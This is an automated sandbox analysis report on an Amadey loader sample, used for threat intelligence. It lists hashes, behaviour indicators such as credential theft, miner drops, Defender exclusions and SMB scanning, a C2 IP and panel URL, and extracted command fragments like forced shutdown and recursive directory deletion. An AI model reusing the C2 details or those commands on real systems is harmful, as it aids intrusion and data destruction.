File name:

random.exe

Full analysis: https://app.any.run/tasks/22f8b809-ea9a-4df7-b285-62c392242151
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: May 30, 2025, 09:06:10
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
amadey
botnet
stealer
loader
scan
smbscan
telegram
vidar
gcleaner
auto-startup
xmrig
lumma
themida
rdp
auto-download
auto-sch
evasion
github
sectoprat
arechclient2
rat
auto
generic
autoit
redline
metastealer
golang
miner
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

1112C0D91931C86989DAB2C7B64464B1

SHA1:

11E633B800D68BC94532F29C37A61DB88B90A933

SHA256:

9EBFB0ED3D31F3F3340C4B121AAA4B9B32451CA46807965F25310361666F9B7B

SSDEEP:

98304:O4oFp6gD8fvv9KNN2yAChpjtixh2fsS3p5/oF6PUayi4hoRgox+l5pZayhIfns+a:

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • AMADEY mutex has been found

      • random.exe (PID: 7376)
      • ramez.exe (PID: 7636)
      • CubaNetStartDesign.exe (PID: 7624)
      • amnew.exe (PID: 8064)
      • saren.exe (PID: 3008)
    • AMADEY has been detected (SURICATA)

      • ramez.exe (PID: 7636)
      • saren.exe (PID: 3008)
    • Connects to the CnC server

      • ramez.exe (PID: 7636)
      • svchost.exe (PID: 2196)
      • saren.exe (PID: 3008)
      • MSBuild.exe (PID: 4224)
      • cmd.exe (PID: 720)
    • Create files in the Startup directory

      • 5VUNsb2.exe (PID: 8160)
    • Executing a file with an untrusted certificate

      • e03a5affac.exe (PID: 2140)
      • 8f2lGlV.exe (PID: 3020)
      • 8f2lGlV.exe (PID: 1280)
      • BQ89TJtgW5rC.exe (PID: 3396)
      • w54B0Xl.exe (PID: 9856)
      • sGe7ljJ.exe (PID: 1804)
      • 0e97625191.exe (PID: 8228)
    • SMBSCAN has been detected (SURICATA)

      • 5VUNsb2.exe (PID: 8160)
      • 5VUNsb2.exe (PID: 1072)
      • 5VUNsb2.exe (PID: 4200)
      • 5VUNsb2.exe (PID: 6132)
      • 5VUNsb2.exe (PID: 5680)
    • AMADEY has been detected (YARA)

      • ramez.exe (PID: 7636)
    • VIDAR mutex has been found

      • 8f2lGlV.exe (PID: 1280)
    • Actions looks like stealing of personal data

      • 8f2lGlV.exe (PID: 1280)
    • Steals credentials from Web Browsers

      • 8f2lGlV.exe (PID: 1280)
    • GCLEANER has been detected (SURICATA)

      • e03a5affac.exe (PID: 2140)
    • Attempting to scan the network

      • 5VUNsb2.exe (PID: 1072)
      • 5VUNsb2.exe (PID: 8160)
      • 5VUNsb2.exe (PID: 4200)
      • 5VUNsb2.exe (PID: 6132)
      • 5VUNsb2.exe (PID: 5680)
    • XMRig has been detected

      • oxDU0MW.exe (PID: 5720)
      • WinTemp-v4.exe (PID: 6800)
    • Known privilege escalation attack

      • dllhost.exe (PID: 7380)
    • Adds process to the Windows Defender exclusion list

      • WinTemp-v4.exe (PID: 6800)
    • Changes Windows Defender settings

      • WinTemp-v4.exe (PID: 6800)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5084)
      • MSBuild.exe (PID: 9640)
      • escTnvLeZQqAx.exe (PID: 10160)
      • MSBuild.exe (PID: 7232)
      • MSBuild.exe (PID: 10192)
      • MSBuild.exe (PID: 6264)
      • MSBuild.exe (PID: 5304)
      • 65fc8f9c29.exe (PID: 8868)
      • MSBuild.exe (PID: 10732)
    • Uses Task Scheduler to autorun other applications

      • WinTemp-v4.exe (PID: 6800)
    • Starts REAGENTC.EXE to disable the Windows Recovery Environment

      • ReAgentc.exe (PID: 9492)
    • VIDAR has been detected (SURICATA)

      • MSBuild.exe (PID: 9220)
    • GENERIC has been found (auto)

      • e03a5affac.exe (PID: 2140)
      • ramez.exe (PID: 7636)
      • mDwGV6i.exe (PID: 1852)
    • SECTOPRAT has been detected

      • cmd.exe (PID: 9384)
      • cmd.exe (PID: 9612)
    • REDLINE has been detected (SURICATA)

      • MSBuild.exe (PID: 4224)
    • METASTEALER has been detected (SURICATA)

      • MSBuild.exe (PID: 4224)
    • MINER has been detected (SURICATA)

      • cmd.exe (PID: 720)
  • SUSPICIOUS

    • Reads the BIOS version

      • ramez.exe (PID: 7636)
      • random.exe (PID: 7376)
    • Executable content was dropped or overwritten

      • random.exe (PID: 7376)
      • cmd.exe (PID: 8180)
      • ramez.exe (PID: 7636)
      • dllhost.exe (PID: 4608)
      • release_file.exe (PID: 2504)
      • release_file.exe (PID: 3240)
      • oxDU0MW.exe (PID: 5720)
      • csc.exe (PID: 2644)
      • amnew.exe (PID: 8064)
      • c6pOr8OqQOC.exe (PID: 8684)
      • c6pOr8OqQOC.tmp (PID: 8768)
      • ntfsundelete.exe (PID: 9092)
      • e03a5affac.exe (PID: 2140)
      • csc.exe (PID: 8808)
      • saren.exe (PID: 3008)
      • csc.exe (PID: 10192)
      • csc.exe (PID: 9828)
      • csc.exe (PID: 9484)
      • csc.exe (PID: 9928)
      • csc.exe (PID: 7480)
      • csc.exe (PID: 7208)
      • csc.exe (PID: 9688)
      • csc.exe (PID: 5868)
      • csc.exe (PID: 632)
      • csc.exe (PID: 7444)
      • csc.exe (PID: 10064)
      • csc.exe (PID: 1280)
      • WinTemp-v4.exe (PID: 6800)
      • csc.exe (PID: 2240)
      • f844707398.exe (PID: 8648)
      • JFDGQDUS.exe (PID: 904)
      • csc.exe (PID: 6456)
      • JFDGQDUS.exe (PID: 7240)
      • ModSolar.exe (PID: 8796)
      • ModSolar.exe (PID: 8860)
      • b8f5ac3d6b.exe (PID: 8664)
      • csc.exe (PID: 11108)
      • csc.exe (PID: 9468)
      • csc.exe (PID: 10344)
      • csc.exe (PID: 9660)
      • rundll32.exe (PID: 7476)
      • escTnvLeZQqAx.exe (PID: 10160)
      • csc.exe (PID: 10664)
      • mDwGV6i.exe (PID: 1852)
      • csc.exe (PID: 10196)
      • csc.exe (PID: 10672)
      • csc.exe (PID: 9368)
      • csc.exe (PID: 11036)
      • csc.exe (PID: 10880)
      • csc.exe (PID: 9204)
      • csc.exe (PID: 2344)
      • csc.exe (PID: 6272)
      • csc.exe (PID: 4408)
    • Starts itself from another location

      • random.exe (PID: 7376)
      • amnew.exe (PID: 8064)
      • JFDGQDUS.exe (PID: 904)
      • ModSolar.exe (PID: 8860)
    • Reads security settings of Internet Explorer

      • random.exe (PID: 7376)
      • ramez.exe (PID: 7636)
      • release_file.exe (PID: 2504)
      • 8f2lGlV.exe (PID: 1280)
      • e03a5affac.exe (PID: 2140)
      • saren.exe (PID: 3008)
      • amnew.exe (PID: 8064)
    • Contacting a server suspected of hosting an CnC

      • ramez.exe (PID: 7636)
      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5084)
      • saren.exe (PID: 3008)
      • MSBuild.exe (PID: 6264)
      • MSBuild.exe (PID: 9640)
      • MSBuild.exe (PID: 7232)
      • MSBuild.exe (PID: 10192)
      • escTnvLeZQqAx.exe (PID: 10160)
      • MSBuild.exe (PID: 5304)
      • 65fc8f9c29.exe (PID: 8868)
      • MSBuild.exe (PID: 10732)
    • Process requests binary or script from the Internet

      • ramez.exe (PID: 7636)
      • saren.exe (PID: 3008)
      • escTnvLeZQqAx.exe (PID: 10160)
    • Starts CMD.EXE for commands execution

      • 5VUNsb2.exe (PID: 8160)
      • release_file.exe (PID: 3240)
      • BQ89TJtgW5rC.exe (PID: 3396)
      • w54B0Xl.exe (PID: 9856)
      • WinTemp-v4.exe (PID: 6800)
      • cmd.exe (PID: 9384)
      • cmd.exe (PID: 9612)
      • f844707398.exe (PID: 8648)
      • cmd.exe (PID: 9888)
      • cmd.exe (PID: 10120)
      • b8f5ac3d6b.exe (PID: 8664)
      • ce14e4658f.exe (PID: 11212)
      • cmd.exe (PID: 10296)
      • nircmd.exe (PID: 11212)
      • cmd.exe (PID: 11368)
    • Potential Corporate Privacy Violation

      • ramez.exe (PID: 7636)
      • 5VUNsb2.exe (PID: 8160)
      • 5VUNsb2.exe (PID: 1072)
      • 5VUNsb2.exe (PID: 4200)
      • e03a5affac.exe (PID: 2140)
      • saren.exe (PID: 3008)
      • 5VUNsb2.exe (PID: 6132)
      • 5VUNsb2.exe (PID: 5680)
      • escTnvLeZQqAx.exe (PID: 10160)
      • cmd.exe (PID: 720)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7232)
      • wscript.exe (PID: 4024)
    • Connects to the server without a host name

      • ramez.exe (PID: 7636)
      • e03a5affac.exe (PID: 2140)
      • saren.exe (PID: 3008)
      • net.exe (PID: 9068)
      • escTnvLeZQqAx.exe (PID: 10160)
    • There is functionality for enable RDP (YARA)

      • ramez.exe (PID: 7636)
    • Process drops legitimate windows executable

      • release_file.exe (PID: 2504)
      • ramez.exe (PID: 7636)
      • c6pOr8OqQOC.tmp (PID: 8768)
    • Reads the date of Windows installation

      • release_file.exe (PID: 2504)
    • Drops a system driver (possible attempt to evade defenses)

      • release_file.exe (PID: 3240)
    • Hides command output

      • cmd.exe (PID: 5308)
      • cmd.exe (PID: 7364)
      • cmd.exe (PID: 7392)
      • cmd.exe (PID: 7476)
      • cmd.exe (PID: 4428)
      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 7492)
      • cmd.exe (PID: 5328)
      • cmd.exe (PID: 4528)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 5308)
      • cmd.exe (PID: 7476)
      • cmd.exe (PID: 7392)
      • cmd.exe (PID: 7364)
      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 5328)
      • cmd.exe (PID: 7492)
      • cmd.exe (PID: 4428)
    • Stops a currently running service

      • sc.exe (PID: 4424)
      • sc.exe (PID: 4892)
    • Windows service management via SC.EXE

      • sc.exe (PID: 7824)
      • sc.exe (PID: 6944)
      • sc.exe (PID: 7824)
      • sc.exe (PID: 8128)
    • Creates a new Windows service

      • sc.exe (PID: 7452)
      • sc.exe (PID: 6136)
    • There is functionality for taking screenshot (YARA)

      • e03a5affac.exe (PID: 2140)
    • Searches for installed software

      • 8f2lGlV.exe (PID: 1280)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • 8f2lGlV.exe (PID: 1280)
      • MSBuild.exe (PID: 5304)
      • MSBuild.exe (PID: 10732)
    • BASE64 encoded PowerShell command has been detected

      • 8f2lGlV.exe (PID: 1280)
      • MSBuild.exe (PID: 9220)
    • The process hide an interactive prompt from the user

      • 8f2lGlV.exe (PID: 1280)
      • MSBuild.exe (PID: 9220)
    • The process bypasses the loading of PowerShell profile settings

      • 8f2lGlV.exe (PID: 1280)
      • MSBuild.exe (PID: 9220)
    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 4024)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 4024)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 4024)
    • Starts POWERSHELL.EXE for commands execution

      • 8f2lGlV.exe (PID: 1280)
      • WinTemp-v4.exe (PID: 6800)
      • ntfsundelete.exe (PID: 9092)
      • MSBuild.exe (PID: 9220)
      • cmd.exe (PID: 11092)
      • mDwGV6i.exe (PID: 1852)
    • Script adds exclusion process to Windows Defender

      • WinTemp-v4.exe (PID: 6800)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 4024)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6048)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 6048)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 2644)
      • csc.exe (PID: 8808)
      • csc.exe (PID: 9484)
      • csc.exe (PID: 10192)
      • csc.exe (PID: 7208)
      • csc.exe (PID: 9828)
      • csc.exe (PID: 10064)
      • csc.exe (PID: 9928)
      • csc.exe (PID: 2240)
      • csc.exe (PID: 632)
      • csc.exe (PID: 5868)
      • csc.exe (PID: 7444)
      • csc.exe (PID: 7480)
      • csc.exe (PID: 9688)
      • csc.exe (PID: 1280)
      • csc.exe (PID: 6456)
      • csc.exe (PID: 9468)
      • csc.exe (PID: 10664)
      • csc.exe (PID: 11108)
      • csc.exe (PID: 9660)
      • csc.exe (PID: 10344)
      • csc.exe (PID: 10196)
      • csc.exe (PID: 11036)
      • csc.exe (PID: 10672)
      • csc.exe (PID: 2344)
      • csc.exe (PID: 9368)
      • csc.exe (PID: 10880)
      • csc.exe (PID: 9204)
      • csc.exe (PID: 6272)
      • csc.exe (PID: 4408)
    • Script adds exclusion path to Windows Defender

      • WinTemp-v4.exe (PID: 6800)
    • The process executes via Task Scheduler

      • ramez.exe (PID: 644)
      • saren.exe (PID: 7240)
      • ramez.exe (PID: 10656)
      • saren.exe (PID: 8436)
    • Starts a Microsoft application from unusual location

      • ORfxRY2.exe (PID: 8904)
    • Base64-obfuscated command line is found

      • 8f2lGlV.exe (PID: 1280)
      • MSBuild.exe (PID: 9220)
    • The process drops C-runtime libraries

      • c6pOr8OqQOC.tmp (PID: 8768)
    • Executing commands from a ".bat" file

      • BQ89TJtgW5rC.exe (PID: 3396)
      • w54B0Xl.exe (PID: 9856)
      • b8f5ac3d6b.exe (PID: 8664)
      • cmd.exe (PID: 10120)
      • ce14e4658f.exe (PID: 11212)
      • cmd.exe (PID: 10296)
      • nircmd.exe (PID: 11212)
      • cmd.exe (PID: 11368)
    • Executes application which crashes

      • Win-v42.exe (PID: 6156)
      • escTnvLeZQqAx.exe (PID: 10160)
      • Win-v41.exe (PID: 8576)
    • Get information on the list of running processes

      • cmd.exe (PID: 9384)
      • cmd.exe (PID: 9612)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 9384)
      • cmd.exe (PID: 9612)
    • Application launched itself

      • cmd.exe (PID: 9384)
      • cmd.exe (PID: 9612)
      • cmd.exe (PID: 9888)
      • cmd.exe (PID: 10120)
      • cmd.exe (PID: 10296)
      • cmd.exe (PID: 11368)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • f844707398.exe (PID: 8648)
      • WinTemp-v4.exe (PID: 6800)
    • Connects to unusual port

      • f844707398.exe (PID: 8648)
      • mDwGV6i.exe (PID: 1852)
      • WinTemp-v4.exe (PID: 6800)
      • MSBuild.exe (PID: 4224)
      • cmd.exe (PID: 720)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 208)
    • The executable file from the user directory is run by the CMD process

      • Dragon.com (PID: 9824)
      • Roster.com (PID: 5548)
      • nircmd.exe (PID: 11212)
      • nircmd.exe (PID: 11656)
    • Starts application with an unusual extension

      • cmd.exe (PID: 9612)
      • cmd.exe (PID: 9384)
      • cmd.exe (PID: 6816)
      • cmd.exe (PID: 8748)
    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 5204)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 632)
      • cmd.exe (PID: 10004)
    • Starts the AutoIt3 executable file

      • cmd.exe (PID: 9384)
      • cmd.exe (PID: 9612)
    • Uses powercfg.exe to modify the power settings

      • WinTemp-v4.exe (PID: 6800)
    • Drops 7-zip archiver for unpacking

      • b8f5ac3d6b.exe (PID: 8664)
    • Executes as Windows Service

      • cmd.exe (PID: 11092)
      • VSSVC.exe (PID: 4436)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 11132)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 11092)
    • Creates new registry property (POWERSHELL)

      • powershell.exe (PID: 744)
  • INFO

    • Create files in a temporary directory

      • random.exe (PID: 7376)
      • ramez.exe (PID: 7636)
      • release_file.exe (PID: 2504)
      • 8f2lGlV.exe (PID: 1280)
      • oxDU0MW.exe (PID: 5720)
      • powershell.exe (PID: 6048)
      • cvtres.exe (PID: 5204)
      • csc.exe (PID: 2644)
      • amnew.exe (PID: 8064)
      • powershell.exe (PID: 4212)
    • Process checks computer location settings

      • random.exe (PID: 7376)
      • ramez.exe (PID: 7636)
      • release_file.exe (PID: 2504)
      • amnew.exe (PID: 8064)
    • Checks supported languages

      • ramez.exe (PID: 7636)
      • random.exe (PID: 7376)
      • 5VUNsb2.exe (PID: 8160)
      • e03a5affac.exe (PID: 2140)
      • release_file.exe (PID: 2504)
      • release_file.exe (PID: 3240)
      • 5VUNsb2.exe (PID: 1072)
      • 8f2lGlV.exe (PID: 3020)
      • 8f2lGlV.exe (PID: 1280)
      • 08IyOOF.exe (PID: 1760)
      • 5VUNsb2.exe (PID: 4200)
      • oxDU0MW.exe (PID: 5720)
      • WinTemp-v4.exe (PID: 6800)
      • 5VUNsb2.exe (PID: 6132)
      • CubaNetStartDesign.exe (PID: 7624)
      • MSBuild.exe (PID: 5084)
      • csc.exe (PID: 2644)
      • cvtres.exe (PID: 5204)
      • amnew.exe (PID: 8064)
      • saren.exe (PID: 3008)
      • 5VUNsb2.exe (PID: 5680)
      • ramez.exe (PID: 644)
      • saren.exe (PID: 7240)
    • Reads the computer name

      • random.exe (PID: 7376)
      • ramez.exe (PID: 7636)
      • 5VUNsb2.exe (PID: 8160)
      • release_file.exe (PID: 2504)
      • 5VUNsb2.exe (PID: 1072)
      • e03a5affac.exe (PID: 2140)
      • 8f2lGlV.exe (PID: 3020)
      • 8f2lGlV.exe (PID: 1280)
      • 5VUNsb2.exe (PID: 4200)
      • oxDU0MW.exe (PID: 5720)
      • 5VUNsb2.exe (PID: 6132)
      • MSBuild.exe (PID: 5084)
      • amnew.exe (PID: 8064)
      • saren.exe (PID: 3008)
    • Creates files or folders in the user directory

      • ramez.exe (PID: 7636)
      • 5VUNsb2.exe (PID: 8160)
      • e03a5affac.exe (PID: 2140)
      • 8f2lGlV.exe (PID: 1280)
    • Checks proxy server information

      • ramez.exe (PID: 7636)
      • 8f2lGlV.exe (PID: 1280)
      • e03a5affac.exe (PID: 2140)
      • saren.exe (PID: 3008)
    • The sample compiled with english language support

      • ramez.exe (PID: 7636)
      • dllhost.exe (PID: 4608)
      • release_file.exe (PID: 2504)
      • release_file.exe (PID: 3240)
      • ntfsundelete.exe (PID: 9092)
      • c6pOr8OqQOC.tmp (PID: 8768)
      • saren.exe (PID: 3008)
      • JFDGQDUS.exe (PID: 904)
      • JFDGQDUS.exe (PID: 7240)
      • ModSolar.exe (PID: 8796)
      • ModSolar.exe (PID: 8860)
      • b8f5ac3d6b.exe (PID: 8664)
    • Launch of the file from Startup directory

      • 5VUNsb2.exe (PID: 8160)
    • Themida protector has been detected

      • ramez.exe (PID: 7636)
    • Checks transactions between databases Windows and Oracle

      • release_file.exe (PID: 2504)
      • oxDU0MW.exe (PID: 5720)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 4608)
      • mmc.exe (PID: 6540)
      • powershell.exe (PID: 6048)
      • dllhost.exe (PID: 7380)
      • powershell.exe (PID: 4212)
    • Reads Microsoft Office registry keys

      • release_file.exe (PID: 2504)
    • Reads the machine GUID from the registry

      • release_file.exe (PID: 2504)
      • 8f2lGlV.exe (PID: 3020)
      • 8f2lGlV.exe (PID: 1280)
      • e03a5affac.exe (PID: 2140)
      • oxDU0MW.exe (PID: 5720)
      • csc.exe (PID: 2644)
    • Reads the software policy settings

      • e03a5affac.exe (PID: 2140)
      • 8f2lGlV.exe (PID: 1280)
      • powershell.exe (PID: 6048)
      • MSBuild.exe (PID: 5084)
      • powershell.exe (PID: 4212)
    • Application based on Golang

      • 5VUNsb2.exe (PID: 8160)
    • Detects GO elliptic curve encryption (YARA)

      • 5VUNsb2.exe (PID: 8160)
    • Manual execution by a user

      • 8f2lGlV.exe (PID: 1280)
      • wscript.exe (PID: 4024)
      • 5VUNsb2.exe (PID: 4200)
      • 5VUNsb2.exe (PID: 5680)
      • Win-v42.exe (PID: 6156)
    • Creates files in the program directory

      • 8f2lGlV.exe (PID: 1280)
    • Reads CPU info

      • 8f2lGlV.exe (PID: 1280)
    • Reads Environment values

      • 8f2lGlV.exe (PID: 1280)
    • Reads product name

      • 8f2lGlV.exe (PID: 1280)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7224)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7224)
    • Application launched itself

      • chrome.exe (PID: 5360)
      • chrome.exe (PID: 6436)
      • chrome.exe (PID: 8408)
      • chrome.exe (PID: 7480)
      • chrome.exe (PID: 8712)
      • chrome.exe (PID: 8920)
      • chrome.exe (PID: 9148)
      • chrome.exe (PID: 8560)
      • chrome.exe (PID: 8788)
      • chrome.exe (PID: 7332)
      • chrome.exe (PID: 8596)
      • chrome.exe (PID: 9268)
      • chrome.exe (PID: 9688)
      • chrome.exe (PID: 9492)
      • chrome.exe (PID: 8672)
      • chrome.exe (PID: 8756)
      • chrome.exe (PID: 2092)
      • chrome.exe (PID: 5452)
      • chrome.exe (PID: 7652)
      • chrome.exe (PID: 6108)
      • chrome.exe (PID: 8544)
      • chrome.exe (PID: 10076)
      • chrome.exe (PID: 9052)
      • chrome.exe (PID: 5172)
      • chrome.exe (PID: 8216)
      • chrome.exe (PID: 10312)
      • chrome.exe (PID: 10608)
      • chrome.exe (PID: 4268)
      • chrome.exe (PID: 9368)
      • chrome.exe (PID: 10880)
    • Changes the registry key values via Powershell

      • ntfsundelete.exe (PID: 9092)
    • Attempting to use instant messaging service

      • MSBuild.exe (PID: 5304)
    • Creates a new folder

      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 9288)
    • The sample compiled with chinese language support

      • ModSolar.exe (PID: 8860)
      • JFDGQDUS.exe (PID: 7240)
    • Changes the display of characters in the console

      • cmd.exe (PID: 6816)
      • cmd.exe (PID: 8748)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 6988)
    • NirSoft software is detected

      • nircmd.exe (PID: 11656)
      • nircmd.exe (PID: 11212)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Amadey

(PID) Process(7636) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)2025
0000043f
S-%lu-
rundll32.exe
-%lu
og:
\App
AVG
ProductName
exe
SYSTEM\ControlSet001\Services\BasicDisplay\Video
WinDefender
d1
/te4h2nus/index.php
"taskkill /f /im "
--
&&
<d>
\0000
av:
lv:
&unit=
ComputerName
GET
00000423
sd:
360TotalSecurity
random
Startup
SOFTWARE\Microsoft\Windows NT\CurrentVersion
Sophos
Programs
-executionpolicy remotesigned -File "
.jpg
cred.dll|clip.dll|
Comodo
rundll32
Powershell.exe
clip.dll
" && timeout 1 && del
ramez.exe
%USERPROFILE%
pc:
------
Rem
:::
dm:
------
ar:
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
e2
AVAST Software
=
Keyboard Layout\Preload
st=s
ProgramData\
e3
?scr=1
#
cmd
Content-Disposition: form-data; name="data"; filename="
00000419
wb
r=
ps1
d610cf342e
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Bitdefender
DefaultSettings.YResolution
vs:
+++
/Plugins/
e1
" Content-Type: application/octet-stream
abcdefghijklmnopqrstuvwxyz0123456789-_
dll
Kaspersky Lab
id:
kernel32.dll
msi
&& Exit"
ESET
/k
Panda Security
DefaultSettings.XResolution
00000422
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
http://
https://
/quiet
<c>
5.34
rb
Content-Type: application/x-www-form-urlencoded
|
cred.dll
shutdown -s -t 0
CurrentBuild
shell32.dll
Content-Type: multipart/form-data; boundary=----
\
185.156.72.96
POST
GetNativeSystemInfo
2022
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
un:
-unicode-
2019
VideoID
Doctor Web
Avira
bi:
%-lu
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
os:
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
zip
Norton
Main
" && ren
2016
cmd /C RMDIR /s/q
0123456789
"
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:01 04:57:19+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.29
CodeSize: 317952
InitializedDataSize: 107520
UninitializedDataSize: -
EntryPoint: 0x30d000
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
575
Monitored processes
429
Malicious processes
46
Suspicious processes
20

Behavior graph

Click at the process to see the details
start random.exe sppextcomobj.exe no specs slui.exe #AMADEY ramez.exe #SMBSCAN 5vunsb2.exe cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs #GCLEANER e03a5affac.exe release_file.exe Copy/Move/Rename/Delete/Link Object mmc.exe no specs mmc.exe release_file.exe cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs #SMBSCAN 5vunsb2.exe 8f2lglv.exe no specs #VIDAR 8f2lglv.exe 08iyoof.exe no specs conhost.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs #SMBSCAN 5vunsb2.exe wscript.exe no specs #LUMMA msbuild.exe #XMRIG oxdu0mw.exe attrib.exe no specs conhost.exe no specs attrib.exe no specs conhost.exe no specs CMSTPLUA attrib.exe no specs conhost.exe no specs #XMRIG wintemp-v4.exe powershell.exe no specs conhost.exe no specs #SMBSCAN 5vunsb2.exe cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cubanetstartdesign.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs #LUMMA svchost.exe amnew.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs #AMADEY saren.exe powershell.exe no specs conhost.exe no specs #SMBSCAN 5vunsb2.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs ramez.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs saren.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs c6por8oqqoc.exe chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs c6por8oqqoc.tmp orfxry2.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs net.exe ntfsundelete.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs cron.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs csc.exe chrome.exe no specs conhost.exe no specs bq89tjtgw5rc.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs cvtres.exe no specs csc.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs #SECTOPRAT cmd.exe no specs #LUMMA msbuild.exe chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs cvtres.exe no specs cron2.exe no specs conhost.exe no specs w54b0xl.exe no specs conhost.exe no specs csc.exe cvtres.exe no specs #LUMMA esctnvlezqqax.exe csc.exe #SECTOPRAT cmd.exe no specs conhost.exe no specs cvtres.exe no specs msbuild.exe no specs q9oobqhys.exe no specs #LUMMA msbuild.exe gmwvumq.exe no specs conhost.exe no specs fuck122112.exe no specs conhost.exe no specs csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe csc.exe cvtres.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs csc.exe msbuild.exe no specs #LUMMA msbuild.exe msbuild.exe no specs msbuild.exe no specs sge7ljj.exe no specs #LUMMA msbuild.exe conhost.exe no specs nico.exe no specs conhost.exe no specs cvtres.exe no specs powershell.exe no specs conhost.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs csc.exe csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs slui.exe no specs #VIDAR msbuild.exe msbuild.exe no specs msbuild.exe no specs #REDLINE msbuild.exe alex123.exe no specs conhost.exe no specs pjxmupi.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reagentc.exe no specs win-v42.exe #LUMMA msbuild.exe werfault.exe no specs ssa-7005-sm-34062529.exe no specs tasklist.exe no specs tasklist.exe no specs findstr.exe no specs findstr.exe no specs dfsvc.exe f844707398.exe tasklist.exe no specs findstr.exe no specs tasklist.exe no specs findstr.exe no specs cmd.exe no specs cmd.exe no specs extrac32.exe no specs extrac32.exe no specs chrome.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs 